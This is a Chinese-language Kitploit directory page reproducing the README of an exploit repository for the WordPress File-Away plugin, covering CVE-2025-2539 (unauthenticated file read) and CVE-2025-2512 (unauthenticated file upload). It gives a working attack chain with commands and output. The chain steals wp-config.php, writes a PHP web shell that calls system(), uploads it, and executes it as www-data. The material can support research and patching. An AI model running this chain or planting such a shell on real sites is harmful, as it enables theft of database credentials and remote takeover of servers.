Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
file-away-exploit — 针对WordPress File-Away插件(CVE-2025-2512和CVE-2025-2539)的远程代码执行利用脚本 | Kitploit
工具/GitHubGitHub/whattheslime/file-away-exploit
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试Payload 开发
GitHubwhattheslime/file-away-exploit

file-away-exploit

针对WordPress File-Away插件(CVE-2025-2512和CVE-2025-2539)的远程代码执行利用脚本

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

File-Away 漏洞利用(CVE-2025-2539 和 CVE-2025-2512)

📌 目的

本仓库包含 File-Away(一个用于文件管理的 WordPress 插件)的漏洞详情和利用脚本。

该插件存在两个可导致远程代码执行的漏洞(已在 File-Away 3.9.9.0.1 上测试):

  • CVE-2025-2539:未认证的任意文件读取
  • CVE-2025-2512:未认证的任意文件上传

📖 未认证的任意文件读取

File-Away WordPress 插件在 3.9.9.0.1 及之前的所有版本中存在未认证的任意文件读取漏洞。

该漏洞由两个问题导致:lib/cls/class.fileaway_stats.php:file_away_stats->ajax() 函数缺少身份验证检查,以及 lib/cls/class.fileaway_encrypted.php:fileaway_encrypted->encrypt() 函数使用了弱加密算法。

这使得未认证的攻击者能够读取任意文件,包括 WordPress 配置文件 (wp-config.php)。

📁 未认证的任意文件上传

File-Away WordPress 插件在 3.9.9.0.1 及之前的所有版本中存在未认证的任意文件上传漏洞。

该漏洞由两个问题导致:lib/cls/class.fileaway_management.php:fileaway_management->upload() 函数缺少身份验证检查,并且文件类型验证不严格。

这使得未认证的攻击者能够上传任意文件,从而导致代码执行。

🔍 检测

如果目标 WordPress 实例安装并启用了 file-away 插件,则首页上应存在 fileaway_stats nonce:

root@kitploit:~
curl -sk http://127.0.0.1:8000/ | grep -E '^var fileaway_stats.*nonce\":\"([a-f0-9]+)\"};$'
root@kitploit:~
var fileaway_stats = {"ajaxurl":"http:\/\/127.0.0.1:8000\/wp-admin\/admin-ajax.php","nonce":"ff57064c96"};

🐞 漏洞利用步骤

  1. 安装 python 依赖:

    root@kitploit:~
    python3 -m venv venv && venv/bin/pip install httpx
    
  2. 利用 任意文件读取漏洞 获取 WordPress 实例的配置文件 (wp-config.php):

    root@kitploit:~
    venv/bin/python3 get_config.py -t http://127.0.0.1:8000
    
    root@kitploit:~
    [+] File-Away nonce:          ff57064c96
    [-] Encrypted web root:       LcZh3iec7c3vfHRt2C8=
    [-] Decoder:                  .i%B7%1Dy%F8%21%8A9%25%9Az%29%AA%BB-%BA%FC1%CB%3D5%DB~9%EB%BF%3D
    [-] Charset:                  abcdefghijklmnopqrstuvwxyz0123456789
    [+] Encryption Key:           f2379aghijklmnopqrstuvwxyz65bc410d8e
    [+] Decrypted web root:       /var/www/html
    [+] Config file downloaded:   127.0.0.1:8000_wp-config.php
    
  3. 创建一个用于上传的 PHP 文件:

    root@kitploit:~
    echo '<?php system("id"); ?>' > /tmp/exec.php
    
  4. 利用 任意文件上传漏洞 将 文件上传到服务器:

下载工具
PHP
root@kitploit:~
venv/bin/python3 file_upload.py -t http://127.0.0.1:8000 -c 127.0.0.1:8000_wp-config.php -w /var/www/html/ -f /tmp/exec.php
root@kitploit:~
[-] nonce:            4810861b18
[-] upload_nonce:     0c3f44ae83
[-] loc_nonce:        a17a2df989
[+] File uploaded:    http://127.0.0.1:8000/wp-content/exec.php

⚠️ 默认情况下,文件会上传到 wp-content 目录 ⚠️

  • 访问上传的 PHP 文件:

    root@kitploit:~
    curl -sk http://127.0.0.1:8000/wp-content/exec.php
    
    root@kitploit:~
    uid=33(www-data) gid=33(www-data) groups=33(www-data)